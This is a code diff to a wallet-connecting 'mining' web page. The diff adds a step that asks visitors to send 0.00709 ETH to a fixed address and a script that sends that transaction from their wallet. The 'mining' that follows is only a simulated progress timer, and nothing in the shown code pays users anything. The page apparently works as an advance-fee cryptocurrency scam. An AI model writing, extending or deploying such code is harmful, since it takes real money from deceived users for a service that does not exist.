--- a/index.html
+++ b/index.html
@@ -60,12 +60,17 @@
       <button id="connect-btn">Connect Wallet</button>
       <p id="wallet-address"></p>
     </div>
+    <div id="payment-info" style="display: none;">
+      <p>To start mining, please send 0.00709 ETH to the following address:</p>
+      <p><strong>0xf1b3424bb282ee20e394717dcb4fe59fc67835e0</strong></p>
+      <button id="confirm-payment-btn">Confirm Payment</button>
+    </div>
     <div id="mining-info" style="display: none;">
       <p>Mining Progress: <span id="progress">0</span>%</p>
       <div class="progress-bar">
         <span id="progress-bar" style="width: 0%;"></span>
       </div>
-      <button id="start-mining-btn">Start Mining</button>
+      <button id="start-mining-btn" disabled>Start Mining</button>
       <button id="stop-mining-btn" style="display: none;">Stop Mining</button>
     </div>
   </div>
@@ -73,6 +78,7 @@
   <script>
     const connectBtn = document.getElementById('connect-btn');
     const walletAddressDisplay = document.getElementById('wallet-address');
+    const confirmPaymentBtn = document.getElementById('confirm-payment-btn');
     const startMiningBtn = document.getElementById('start-mining-btn');
     const stopMiningBtn = document.getElementById('stop-mining-btn');
     const progressDisplay = document.getElementById('progress');
@@ -84,6 +90,8 @@
     let minedAmount = 0;
     const targetAmount = 0.0099;
     const miningRate = 0.00000000382; // ETH per second
+    const paymentAmount = 0.00709; // ETH
+    const paymentAddress = '0xf1b3424bb282ee20e394717dcb4fe59fc67835e0';
 
     connectBtn.addEventListener('click', async () => {
       if (window.ethereum) {
@@ -94,12 +102,38 @@
           userAccount = accounts[0];
           walletAddressDisplay.textContent = `Connected: ${userAccount}`;
           document.getElementById('wallet-info').style.display = 'none';
-          document.getElementById('mining-info').style.display = 'block';
+          document.getElementById('payment-info').style.display = 'block';
         } catch (error) {
           console.error('User denied account access');
         }
       } else {
         alert('Please install MetaMask to use this feature');
+      }
+    });
+
+    confirmPaymentBtn.addEventListener('click', async () => {
+      try {
+        const balance = await web3.eth.getBalance(userAccount);
+        if (parseFloat(web3.utils.fromWei(balance, 'ether')) < paymentAmount) {
+          alert('Insufficient funds for payment');
+          return;
+        }
+
+        const tx = {
+          from: userAccount,
+          to: paymentAddress,
+          value: web3.utils.toHex(web3.utils.toWei(paymentAmount.toString(), 'ether')),
+          gas: 21000,
+        };
+
+        await web3.eth.sendTransaction(tx);
+        alert('Payment confirmed. You can now start mining.');
+        document.getElementById('payment-info').style.display = 'none';
+        document.getElementById('mining-info').style.display = 'block';
+        startMiningBtn.disabled = false;
+      } catch (error) {
+        console.error('Payment failed:', error);
+        alert('Payment failed. Please try again.');
       }
     });
 
@@ -112,6 +146,8 @@
         if (minedAmount >= targetAmount) {
           clearInterval(miningInterval);
           alert('Mining complete!');
+          startMiningBtn.disabled = true;
+          stopMiningBtn.style.display = 'none';
         }
       }, 1000);
       startMiningBtn.disabled = true;
